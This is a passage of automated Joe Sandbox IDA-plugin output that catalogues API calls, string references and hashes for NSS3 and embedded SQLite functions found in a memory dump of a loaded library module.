                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE890,00000000), ref: 6CF74410
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF0C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF0C2BF
                                                                                                                                                                                                                                                                                                                      • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000000,00000000,00000000,00000044,?), ref: 6CF7445E
                                                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 6CF7446B
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6CF74482
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6CF74492
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6CF744A4
                                                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 6CF744B2
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE896,00000000), ref: 6CF744BE
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6CF744C7
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6CF744D5
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6CF744EA
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: free$Errormallocstrlen$Handle$EnvironmentStringsmemset$Free$CloseCreateLastProcessValue__p__environqsortstrncmpstrpbrk
                                                                                                                                                                                                                                                                                                                      • String ID: =$D$NSPR_INHERIT_FDS=
                                                                                                                                                                                                                                                                                                                      • API String ID: 3116300875-3553733109
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 5328ddcd576d886174396ecbb9206f4fa0ea19754b7bee585b4e78e13728aeda
                                                                                                                                                                                                                                                                                                                      • Instruction ID: a670c98ccbc52e92cb03a59e6acd45db16af54a9f73b9991e15a31d06e40bab5
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5328ddcd576d886174396ecbb9206f4fa0ea19754b7bee585b4e78e13728aeda
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 27020671E003118FEB21DF69D8847AEBFB8AF06308F25412ADC69A7B41D7709815CFA1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,6CF8A8EC,0000006C), ref: 6CE86DC6
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,6CF8A958,0000006C), ref: 6CE86DDB
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,6CF8A9C4,00000078), ref: 6CE86DF1
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,6CF8AA3C,0000006C), ref: 6CE86E06
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,6CF8AAA8,00000060), ref: 6CE86E1C
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CE86E38
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF0C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF0C2BF
                                                                                                                                                                                                                                                                                                                      • PK11_DoesMechanism.NSS3(?,?), ref: 6CE86E76
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6CE8726F
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6CE87283
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: memcpy$Value$CriticalDoesEnterErrorK11_MechanismSection
                                                                                                                                                                                                                                                                                                                      • String ID: !
                                                                                                                                                                                                                                                                                                                      • API String ID: 3333340300-2657877971
                                                                                                                                                                                                                                                                                                                      • Opcode ID: e92dbe18ef4c6099ac54e958be153261e154144b4f08466b395ecf3961b44288
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 8af4a4c22393440411421371428af7b5192bc7e96391d7c243d73056f6f4398d
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e92dbe18ef4c6099ac54e958be153261e154144b4f08466b395ecf3961b44288
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 80729175E062149FDF60DF28CC8879ABBB5EF49308F2441A9E80CA7751E7319A85CF91
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CDF3C66
                                                                                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(000000FD,?), ref: 6CDF3D04
                                                                                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CDF3EAD
                                                                                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CDF3ED7
                                                                                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CDF3F74
                                                                                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CDF4052
                                                                                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CDF406F
                                                                                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000001), ref: 6CDF410D
                                                                                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011A47,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CDF449C
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: _byteswap_ulong$sqlite3_log
                                                                                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                                                                                      • API String ID: 2597148001-598938438
                                                                                                                                                                                                                                                                                                                      • Opcode ID: c347b442ed71940060d3697096f9d277201d4b914b15664b07ea77b468c455b9
                                                                                                                                                                                                                                                                                                                      • Instruction ID: e8525c0d25edefe6d9c7af811da4ac11fb07aa7377782543f0410c4bf1a5c825
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c347b442ed71940060d3697096f9d277201d4b914b15664b07ea77b468c455b9
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 95829F75A00205DFDB04CF69C580B9AB7F2BF49318F2681A9D915ABB61D731EC43CBA1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaMark_Util.NSS3(?), ref: 6CECACC4
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,000040F4), ref: 6CECACD5
                                                                                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,000040F4), ref: 6CECACF3
                                                                                                                                                                                                                                                                                                                      • SEC_ASN1EncodeInteger_Util.NSS3(?,00000018,00000003), ref: 6CECAD3B
                                                                                                                                                                                                                                                                                                                      • SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6CECADC8
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CECADDF
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CECADF0
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF0C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF0C2BF
                                                                                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CECB06A
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CECB08C
                                                                                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CECB1BA
                                                                                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CECB27C
                                                                                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,00002010), ref: 6CECB2CA
                                                                                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CECB3C1
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CECB40C
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Util$Error$Arena_Free$ArenaItem_memset$Alloc_CopyEncodeInteger_Mark_ValueZfree
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 1285963562-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: b7156a54fc08c5247050a6e2d481f1df9e7024af3ee897401c8906dffd3826b3
                                                                                                                                                                                                                                                                                                                      • Instruction ID: db115462f5bb17dcf0c8e62b2f53f39973249372bfd823648dad1e3f5b2d2808
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b7156a54fc08c5247050a6e2d481f1df9e7024af3ee897401c8906dffd3826b3
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BF228D71A04301AFE710CF14CE45B9A77B1AF8430CF24856CE8695B7A2E772E859CB97
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6CE125F3
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      • unsafe use of virtual table "%s", xrefs: 6CE130D1
                                                                                                                                                                                                                                                                                                                      • no such index: "%s", xrefs: 6CE1319D
                                                                                                                                                                                                                                                                                                                      • %s.%s, xrefs: 6CE12D68
                                                                                                                                                                                                                                                                                                                      • no such table: %s, xrefs: 6CE126AC
                                                                                                                                                                                                                                                                                                                      • H, xrefs: 6CE1322D
                                                                                                                                                                                                                                                                                                                      • %s.%s.%s, xrefs: 6CE1302D
                                                                                                                                                                                                                                                                                                                      • access to view "%s" prohibited, xrefs: 6CE12F4A
                                                                                                                                                                                                                                                                                                                      • cannot join using column %s - column not present in both tables, xrefs: 6CE132AB
                                                                                                                                                                                                                                                                                                                      • recursive reference in a subquery: %s, xrefs: 6CE122E5
                                                                                                                                                                                                                                                                                                                      • a NATURAL join may not have an ON or USING clause, xrefs: 6CE132C1
                                                                                                                                                                                                                                                                                                                      • '%s' is not a function, xrefs: 6CE12FD2
                                                                                                                                                                                                                                                                                                                      • multiple recursive references: %s, xrefs: 6CE122E0
                                                                                                                                                                                                                                                                                                                      • too many references to "%s": max 65535, xrefs: 6CE12FB6
                                                                                                                                                                                                                                                                                                                      • too many columns in result set, xrefs: 6CE13012
                                                                                                                                                                                                                                                                                                                      • cannot have both ON and USING clauses in the same join, xrefs: 6CE132B5
                                                                                                                                                                                                                                                                                                                      • no tables specified, xrefs: 6CE126BE
                                                                                                                                                                                                                                                                                                                      • H, xrefs: 6CE1329F
                                                                                                                                                                                                                                                                                                                      • table %s has %d values for %d columns, xrefs: 6CE1316C
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                                                                                                                      • String ID: %s.%s$%s.%s.%s$'%s' is not a function$H$H$a NATURAL join may not have an ON or USING clause$access to view "%s" prohibited$cannot have both ON and USING clauses in the same join$cannot join using column %s - column not present in both tables$multiple recursive references: %s$no such index: "%s"$no such table: %s$no tables specified$recursive reference in a subquery: %s$table %s has %d values for %d columns$too many columns in result set$too many references to "%s": max 65535$unsafe use of virtual table "%s"
                                                                                                                                                                                                                                                                                                                      • API String ID: 3510742995-3400015513
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 2db69d2c1f4e8d050cc1ad0b1721e52e28fde28704e2d8d12d897057f5404ae5
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 0ee81586292b6f76366f80155ff92e9bad00e07557bf5928df26650c51a8d023
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2db69d2c1f4e8d050cc1ad0b1721e52e28fde28704e2d8d12d897057f5404ae5
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D0D28E74E08249CFDB04CF99C884B9DB7B2FF5A308F388169D855ABB51D735A862CB50
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • sqlite3_initialize.NSS3 ref: 6CE4ED38
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CDE4F60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CDE4FC4
                                                                                                                                                                                                                                                                                                                      • sqlite3_mprintf.NSS3(snippet), ref: 6CE4EF3C
                                                                                                                                                                                                                                                                                                                      • sqlite3_mprintf.NSS3(offsets), ref: 6CE4EFE4
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF0DFC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000003,?,6CDE5001,?,00000003,00000000), ref: 6CF0DFD7
                                                                                                                                                                                                                                                                                                                      • sqlite3_mprintf.NSS3(matchinfo), ref: 6CE4F087
                                                                                                                                                                                                                                                                                                                      • sqlite3_mprintf.NSS3(matchinfo), ref: 6CE4F129
                                                                                                                                                                                                                                                                                                                      • sqlite3_mprintf.NSS3(optimize), ref: 6CE4F1D1
                                                                                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(?), ref: 6CE4F368
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: sqlite3_mprintf$strlen$sqlite3_freesqlite3_initialize
                                                                                                                                                                                                                                                                                                                      • String ID: fts3$fts3_tokenizer$fts3tokenize$fts4$fts4aux$matchinfo$offsets$optimize$porter$simple$snippet$unicode61
                                                                                                                                                                                                                                                                                                                      • API String ID: 2518200370-449611708
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 69a0a88a2f927bbda3978d966e3d8deee60b96c6843b19dc2a3aebb216a4ec1a
                                                                                                                                                                                                                                                                                                                      • Instruction ID: ee8117ce5fd5991e1a60bbd41b065b71a1467052e9c08625f817abdbb2b72b27
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 69a0a88a2f927bbda3978d966e3d8deee60b96c6843b19dc2a3aebb216a4ec1a
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6202F2B1B543409BE7049F31A88573B76B27BC5B0CF24C93CD85A87B01EB79E9468792
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CEC7C33
                                                                                                                                                                                                                                                                                                                      • NSS_OptionGet.NSS3(0000000C,00000000), ref: 6CEC7C66
                                                                                                                                                                                                                                                                                                                      • CERT_DestroyCertificate.NSS3(00000000), ref: 6CEC7D1E
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC7870: SECOID_FindOID_Util.NSS3(?,?,?,6CEC91C5), ref: 6CEC788F
                                                                                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CEC7D48
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE067,00000000), ref: 6CEC7D71
                                                                                                                                                                                                                                                                                                                      • SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6CEC7DD3
                                                                                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CEC7DE1
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CEC7DF8
                                                                                                                                                                                                                                                                                                                      • SECKEY_DestroyPublicKey.NSS3(?), ref: 6CEC7E1A
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE067,00000000), ref: 6CEC7E58
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC7870: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CEC91C5), ref: 6CEC78BB
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC7870: PORT_ZAlloc_Util.NSS3(0000000C,?,?,?,6CEC91C5), ref: 6CEC78FA
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC7870: strchr.VCRUNTIME140(?,0000003A,?,?,?,?,?,?,?,?,?,?,6CEC91C5), ref: 6CEC7930
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC7870: PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6CEC91C5), ref: 6CEC7951
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC7870: memcpy.VCRUNTIME140(00000000,?,?), ref: 6CEC7964
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC7870: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CEC797A
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC7870: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 6CEC7988
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC7870: memcpy.VCRUNTIME140(?,00000001,00000001), ref: 6CEC7998
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC7870: free.MOZGLUE(00000000), ref: 6CEC79A7
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC7870: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,6CEC91C5), ref: 6CEC79BB
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC7870: PR_GetCurrentThread.NSS3(?,?,?,?,6CEC91C5), ref: 6CEC79CA
                                                                                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CEC7E49
                                                                                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CEC7F8C
                                                                                                                                                                                                                                                                                                                      • SECKEY_DestroyPublicKey.NSS3(?), ref: 6CEC7F98
                                                                                                                                                                                                                                                                                                                      • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CEC7FBF
                                                                                                                                                                                                                                                                                                                      • SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CEC7FD9
                                                                                                                                                                                                                                                                                                                      • PK11_ImportEncryptedPrivateKeyInfoAndReturnKey.NSS3(?,00000000,?,?,?,00000001,00000001,?,?,00000000,?), ref: 6CEC8038
                                                                                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6CEC8050
                                                                                                                                                                                                                                                                                                                      • PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6CEC8093
                                                                                                                                                                                                                                                                                                                      • SECOID_FindOID_Util.NSS3 ref: 6CEC7F29
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6CE68298,?,?,?,6CE5FCE5,?), ref: 6CEC07BF
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC07B0: PL_HashTableLookup.NSS3(?,?), ref: 6CEC07E6
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CEC081B
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CEC0825
                                                                                                                                                                                                                                                                                                                      • SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6CEC8072
                                                                                                                                                                                                                                                                                                                      • SECOID_FindOID_Util.NSS3 ref: 6CEC80F5
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CECBC10: SECITEM_CopyItem_Util.NSS3(?,?,?,?,-00000001,?,6CEC800A,00000000,?,00000000,?), ref: 6CECBC3F
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Util$Item_$Error$Zfree$DestroyPublic$Find$Alloc_CopyHashImportK11_LookupTablememcpy$AlgorithmCertificateConstCurrentEncryptedInfoOptionPrivateReturnTag_Threadfreestrchrstrcmpstrlen
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 2815116071-0
